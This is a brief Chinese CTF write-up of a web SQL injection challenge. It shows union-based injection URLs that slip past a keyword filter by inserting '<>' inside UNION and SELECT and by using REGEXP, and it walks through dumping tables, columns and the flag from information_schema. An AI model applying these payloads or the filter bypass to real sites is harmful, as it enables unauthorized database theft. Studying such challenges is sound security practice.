SQL

看提示,他告诉我是个注入。。。试试

url处疯狂尝试?id=1’,1”,1),1’),1”),1’#......发现都没有报错,看来不是报错注入了

然后尝试直接使用union select 123发现也不行。。。。有点蒙,看了下别人的wp才知道这里的union = select被过滤了,具体也没搞懂怎么发现的,因为unionselecturl中的回显没问题。。。。。Bp抓了也看不出问题,网页提交也只是inj code。。。。具体解决方法是使用在unionselect中放置<>=REGEXP代替,双写和混插也会被过滤掉。。。真是个新奇的解法

不管了,抛开这个题还是很简单的

直接?id=1 un<>ion sel<>ect 1,2,3 

回显了个2,直接在2处进行注入

查版本:?id=1 un<>ion sel<>ect 1,version(),3

查数据库名:?id=1 un<>ion sel<>ect 1,database(),3

查数据表:?id=1 un<>ion se<>lect 1, (se<>lect group_concat(table_name) from information_schema.tables where table_schema REGEXP %27sqli%27),3

查列:?id=1 un<>ion se<>lect 1,(se<>lect group_concat(column_name)from information_schema.columns where table_name REGEXP 'info'),3 

查信息:?id=1 un<>ion se<>lect 1, (se<>lect group_concat(flAg_T5ZNdrm) from info),3

 

posted @ 2019-07-24 21:39  七星易  阅读(174)  评论(0编辑  收藏  举报